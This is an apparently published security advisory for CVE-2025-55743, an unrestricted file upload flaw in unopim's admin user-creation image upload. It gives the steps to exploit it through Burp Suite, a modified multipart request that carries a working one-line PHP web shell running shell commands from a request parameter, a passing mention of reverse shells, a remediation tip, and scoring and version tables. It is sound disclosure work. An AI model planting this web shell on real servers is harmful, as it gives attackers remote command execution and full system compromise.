Affected Functionality: Image upload at User creation
Endpoint: /admin/settings/users/create
The image upload at the user creation feature performs only client side file type validation.
A user can capture the request by uploading an image, capture the request through a Proxy like Burp suite.
Make changes to the file extension and content. The .php file when accessed through the link runs the code we provided inside the file.
Modified part of the multipart request body:
Content-Disposition: form-data; name="image[]"; filename="poc.php"
Content-Type: application/x-php
<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>
<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>cmd, example running ls command on the systemLikewise a reverse shell code ( reverse shell of other languages ) can be executed to create a connection to attacker controlled system.
Every user in the dashboard is allowed to change their profile picture, thus allowing any of these users to execute malicious actions at the Server level. Usually a server might host multiple applications, allowing execution of system commands allows complete control of the system. The impact of an RCE vulnerability can be full system compromise, access to database and filesystem, access other sensitive devices on the network.
Please see the POC video: https://drive.proton.me/urls/PH1ESMKHMW#4Vxb2KNu3tmn
Extension Validation: Whitelist allowed extensions. ( use endswith() check rather than contains() as an attacker can bypass such a restriction with filename: poc.jpg.php
| Score | Percentile |
|---|---|
| 0.13% | 31.81% |
| Base score | Version | Severity | Vector |
|---|---|---|---|
| 7.3 | 4.0 | — |
|
| Type | Value |
|---|---|
| GHSA | GHSA-v22v-xwh7-2vrm ↗ |
| CVE | CVE-2025-55743 ↗ |
| CWE id | Name |
|---|---|
| CWE-434 | Unrestricted Upload of File with Dangerous Type |
Vulnerable version ranges and first patched releases as published by GitHub.
| Ecosystem | Package | Vulnerable range | First patched | Vulnerable functions |
|---|---|---|---|---|
| composer | unopim/unopim | <= 0.2.0 | 0.2.1 | — |